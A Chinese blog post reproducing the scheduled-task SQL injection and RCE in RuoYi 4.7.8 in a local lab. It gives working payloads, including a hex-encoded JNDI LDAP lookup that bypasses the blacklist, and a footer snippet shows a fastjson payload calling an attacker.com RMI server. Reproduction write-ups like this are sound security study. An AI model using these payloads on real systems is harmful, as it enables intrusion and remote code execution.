若依4.7.8版本计划任务rce复现

于 2024-06-18 15:40:33 发布
阅读量844 收藏 10
点赞数 4
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45813980/article/details/139775272
版权

0x00 背景

最近项目中发现很多单位都使用了若依二开的系统,而最近若依有个后台计划任务rce的漏洞,比较新,我还没复现过,于是本地搭建一个若依环境复现一下这个漏洞。 这个漏洞在4.7.8版本及之前都存在,现在最新版的若依也只更新到了4.7.9版本。

0x01环境搭建

下载若依4.7.8版本 https://gitee.com/y_project/RuoYi/releases

在这里插入图片描述

开启phpstudy中的mysql
在这里插入图片描述

新建数据库ry,并导入若依的sql文件
sql文件在RuoYi-v4.7.8sql
在这里插入图片描述
在这里插入图片描述

在IDEA中打开RuoYi项目文件 找到配置数据库的地方,修改数据库地址、账号和密码 ![在这里插入图片描述](https://img-blog.csdnimg.cn/direct/3be99856a6f34cd78305eca10cd5ef36.png)

java和maven之前配置过,这里就不用再配置了
尝试运行,启动成功
在这里插入图片描述

访问127.0.0.1 ,成功进入若依系统
在这里插入图片描述

0x02漏洞复现

因为计划任务的漏洞属于后台漏洞,所以在真实渗透需要弱口令等方式进入后台才能利用。 我这里模拟弱口令的场景下,直接进入到后台进行漏洞复现。 进入后台,找到定时任务功能点 ![在这里插入图片描述](https://img-blog.csdnimg.cn/direct/fddab001733b4e089400717ebb0ba991.png)

漏洞1:计划任务sql注入:

添加计划任务 payload

genTableServiceImpl.createTable('UPDATE sys_job SET invoke_target = 'Hack By xiao' WHERE job_id = 1;')

在这里插入图片描述

点击启用任务,发现payload中的sql语句以及被执行,作用是修改id为1的计划任务的值为’Hack By xiao’
在这里插入图片描述

计划任务sql注入复现成功

漏洞2:计划任务命令执行:

看大佬的漏洞分析中说JobInvokeUtil在调用过程中不允许在字符串中使用括号,因此将原始作业表中特定作业的参数值修改为十六进制(绕过防御检测),从而达到命令执行的效果。 使用dnslog进行验证漏洞 payload:

javax.naming.InitialContext.lookup('ldap://xiao.dwph71.dnslog.cn')

将上面的payload进行十六进制编码:

0x6A617661782E6E616D696E672E496E697469616C436F6E746578742E6C6F6F6B757028276C6461703A2F2F7869616F2E6477706837312E646E736C6F672E636E2729

将编码后的payload带入下面的payload中:

genTableServiceImpl.createTable('UPDATE sys_job SET invoke_target = 0x6A617661782E6E616D696E672E496E697469616C436F6E746578742E6C6F6F6B757028276C6461703A2F2F7869616F2E6477706837312E646E736C6F672E636E2729 WHERE job_id = 2;')

上面payload的作用是利用之前的sql注入漏洞,修改job_id为2的计划任务内容,将该计划任务执行的命令改为我们构造好的payload。

在这里插入图片描述

在这里插入图片描述

dnslog收到回显,证明漏洞存在

在这里插入图片描述

漏洞绕过的原因: 在添加 SQL 定时任务时,可以通过 16 进制转换绕过黑名单检测

修复方式

升级到最新版本

00勇士王子
关注
  • 4
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
漏洞复现-Ruoyi若依系列
aming小老弟
05-02 2万+
官方漏洞历史文档。
若依后台管理系统 v4.1
10-27
一直想做一款后台管理系统,看了很多优秀的开源项目但是发现没有合适自己的。于是利用空闲休息时间开始自己写一套后台系统。如此有了若依管理系统。她可以用于所有的Web应用程序,如网站管理后台,网站会员中心,CMS,CRM,OA。所有前端后台代码封装过后十分精简易上手,出错效率低。同时支持移动客户端访问。系统会陆续更新一些实用功能。您是否在找一套合适后台管理系统。您是否在找一套代码易读易懂后台管理系统。那么,现在若依来了。诚意奉献之作若依是给刚出生的女儿取的名字 寓意:你若不离不弃,我必生死相依内置功能用户管理:用户是系统操作者。部门管理:配置系统组织机构。岗位管理:岗位是用户所属职务。菜单管理:配置系统菜单(支持控制到按钮)。角色管理:角色菜单权限分配。字典管理:对系统中经常使用的一些较为固定的数据进行维护。操作日志:系统操作日志记录(含异常)。登录日志:系统登录情况记录(含异常)。在线用户:当前系统中活跃用户状态监控。连接池监视:监视当期系统数据库连接池状态,可进行分析SQL找出系统性能瓶颈。为何选择若依是一个完全响应式,基于Bootstrap3.3.6最新版本开发的主题。她可以用于所有的
记录一次若依后台定时任务命令执行漏洞(不出网利用)
就是我的博客
10-25 4892
记录一次若依后台定时任务命令执行漏洞(不出网利用)。
ruoyi漏洞poc汇总及其原理分析(源码分析)
最新发布
问彡心的博客
05-25 2623
汇总网上常见的若依漏洞poc,根据不同版本的参照对比,分析每个漏洞在不同版本中的代码表现形式,学习这些漏洞后台的代码是如何编写的以及如何进行修复的
若依漏洞利用方式总结
RisunJan的博客
01-14 3603
声明:此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!!!
最新Ruoyi组合拳RCE分析
2401_83799022的博客
03-25 1109
直接执行sql来更改定时任务内容,从而绕过黑白名单的限制。最新版ruoyi rce的方法依旧是在定时任务处:定时任务中可以调用特定包内的bean,通过。众所周知,ruoyi计划任务能调用bean或者class类,这里就是通过调用。此时任务3的调用字符串已经是Jndi payload了,后面直接通过。添加任务:修改id为3的计划任务为jndi payload,并执行。在启动类中我们可以修改代码如下,打印出项目中所有加载的bean,的配置文件为任意想要读取的文件即可,也就达到了任意文件读取效果。
若依定时任务
qq_55005912的博客
06-30 5494
1、如果不是在com.ruo下需要手动添加一下配置信息 2、在需要进行定时的类上加上注解(可以任意命名,不要用ryTask,这个已经被若依的用了)3、在系统中添加定时任务信息
小白可用 | 若依最新后台RCE漏洞利用工具
bobo_patrick的博客
03-07 1260
若依最新后台定时任务SQL注入可导致RCE漏洞的一键利用工具, 扫描和漏洞利用结束会自行删除所创建的定时任务。
若依 创建定时任务
AnnieRabbit的博客
07-20 8496
在ruoyi-api-system 模块创建一个服务类RemoteVoiceConsumeService @FeignClient(contextId = "RemoteVoiceConsumeService", value = ServiceNameConstants.SYSTEM_SERVICE) public interface RemoteVoiceConsumeService { /** * @return 分析结果 */ @GetMapping(value.
java若依框架定时任务
weixin_59499726的博客
03-28 2914
若依框架定时任务
Quartz定时器表
04-12
mySQL数据库Quartz定时器表,mySQL数据库Quartz定时器表,mySQL数据库Quartz定时器表,mySQL数据库Quartz定时器表
RCE.zip_RCE网络_rce_rce分类器
07-14
基于模式识别的RCE网络算法分类器(衰减库仑势法)。利用概率密度进行分类
cas4.x-execution-rce:exp for 4.1.x-4.1.6,4.1.7-4.2.x,填充oracle攻击
04-14
标题中的"CAS4.x-execution-rce"是指在CAS(Central Authentication Service)4.1.x到4.2.x版本中的一个远程代码执行漏洞。CAS是一个开源的身份验证框架,广泛用于Web应用程序的安全性,提供单一登录服务。这个漏洞...
flamelu#Vulnerability-1#金山 V8 终端安全系统 pdf_maker.php 未授权 RCE1
07-25
金山 V8 终端安全系统 pdf_maker.php 存在命令执行漏洞,由于没有过滤危险字符,导致构造特殊字符即可进行命令拼接执行任意命令.漏洞文件:Kings
定时任务 - 若依cloud -【 132 ~ 133 】
aiwokache的博客
10-08 3482
那你就需要把ruoyi-system的service拆出来,拆出来之后,然后在ruoyi-job 的pom.xml引用,然后再去调。就相当于你挂掉的这个任务没执行成功,我恢复了之后,马上回去执行。其中ryTask(bean的名称,如@Component("ryTask")),ryParams(方法名称,' ry '带参数)。我这边演示open feign的调用,因为我们ruoyi-api-system中的api都已经写好了,我们直接调就好了。了,在10:15系统恢复之后,9点,10点的。
若依系统前后台漏洞大全
热门推荐
FY10033的博客
08-07 4万+
漏洞影响范围RuoYi
fastjson rce复现
08-09
fastjson是一款流行的Java JSON库,但因其在解析JSON中的不安全行为而存在远程代码执行(RCE)漏洞。为了复现该漏洞,我们可以按照以下步骤进行操作: 第一步是选择一个适当的fastjson版本,建议使用较早的版本,因为新的版本通常会修复漏洞。将fastjson库添加到Java项目的依赖中。 第二步是创建一个恶意JSON字符串,该字符串中包含能够触发RCE漏洞的payload。例如,可以使用如下的JSON字符串: ``` { "@type":"com.sun.rowset.JdbcRowSetImpl", "dataSourceName":"rmi://attacker.com:1099/Exploit", "autoCommit":true } ``` 在这个例子中,我们使用了`com.sun.rowset.JdbcRowSetImpl`类作为目标,其中连接地址指向攻击者控制的RMI服务器,用于向受害系统发送恶意代码。 第三步是编写Java代码,并将上一步创建的JSON字符串作为输入传递给fastjson的解析器。以下是一个简单的示例: ```java import com.alibaba.fastjson.JSON; public class FastjsonRce { public static void main(String[] args) { String maliciousJson = "{\"@type\":\"com.sun.rowset.JdbcRowSetImpl\",\"dataSourceName\":\"rmi://attacker.com:1099/Exploit\",\"autoCommit\":true}"; Object parsedObject = JSON.parse(maliciousJson); } } ``` 在这个示例中,我们使用`JSON.parse`方法将JSON字符串解析为一个对象。fastjson在解析时会实例化目标类,并调用其构造函数和setter方法,从而导致RCE漏洞的利用。 第四步是运行上述Java代码,并观察是否成功复现RCE漏洞。如果目标系统受到fastjson的漏洞影响,恶意代码会在解析过程中被执行,从而使攻击者可以远程控制该系统。 需要注意的是,复现fastjson RCE漏洞仅用于研究和教育目的,并且应在法律合规和授权的情况下进行。漏洞利用是非法行为,可能导致严重的法律后果。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值